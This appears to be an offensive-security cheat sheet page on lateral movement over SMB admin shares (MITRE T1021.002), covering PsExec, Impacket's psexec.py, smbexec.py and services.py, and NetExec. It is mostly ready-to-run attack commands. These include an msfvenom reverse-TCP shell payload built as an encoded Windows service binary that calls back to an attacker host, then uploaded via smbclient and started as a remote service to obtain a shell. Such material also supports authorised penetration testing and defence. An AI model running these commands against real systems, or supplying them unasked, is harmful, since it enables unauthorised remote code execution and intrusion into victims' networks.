SMB-based

MITRE ATT&CK™ Remote Services: SMB/Windows Admin Shares - Technique T1021.002

Theory

SMB Protocol can be abuse by attackers to execute remote code and perform lateral movements.

Practice

PsExec

Psexec is one of many Sysinternals Tools and can be downloaded here, It connect to the $ADMIN shares with SMB and upload a service binary. Psexec uses psexesvc.exe as the name. Then it connect to the service control manager to create and run a service named PSEXESVC associated with the previous binary. Finally Psexec create some named pipes to handle stdin/stdout/stderr.

The Impacket script psexec can execute a remote process.

psexec.py username:password@10.10.10.10 cmd.exe

We may manually replicate techniques use by PsExec with service.py from impacket

# Create an exe as a service
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ATTACKING_IP> LPORT=<PORT> -f exe-service --platform windows -e x64/xor_dynamic  -o shell.exe

# Upload the exe to windows machine
smbclient '\\<TARGET>\smbshare' -U <user> -c "put shell.exe test.exe"

# Using impacket services.py create service remotely
services.py WORKGROUP/<user>@<TARGET> create -name shell-svc -display my-shell-svc -path "\\\\<TARGET>\\smbshare\\shell.exe"

# Using impacket services.py start the service and get the shell
services.py WORKGROUP/<user>@<TARGET> start -name shell-svc

On windows, we can use PsExec from Windows Sysinternals tools

#Run PsExec
psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe

SmbExec

SmbExec is an Impacket script that works similarly to PsExec without using RemComSvc. The main difference is that smbexec avoids transferring a potentially detectable binary to the target site. Instead, it lives completely off the land by running the local Windows command shell. implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available.

The Impacket script psexec can execute a remote process.

#Semi-interactive shell (doesn't need writable share on the target)
smbexec.py <domain>/<username>:<password>@<host>

NetExec

You can utilize NetExec as a powerful alternative to SMBexec or PsExec for executing code over SMB connections. You can specify the execution methode and the shell interpretor (cmd or powershell.

NetExec can execute a remote process.

#Execute cmd command through smbexec method (methods: mmcexec,atexec,smbexec,wmiexec)
netexec smb <TARGET> -u <USER> -p <PASSWORD> --exec-method smbexec -x whoami

#Execute powershell command through atexec method (methods: mmcexec,atexec,smbexec,wmiexec)
netexec smb <TARGET> -u <USER> -p <PASSWORD> --exec-method atexec -X whoami

#Execute powershell (32bits) command through default wmiexec method (methods: mmcexec,atexec,smbexec,wmiexec)
netexec smb <TARGET> -u <USER> -p <PASSWORD> --force-ps32 -X whoami

Last updated 10 months ago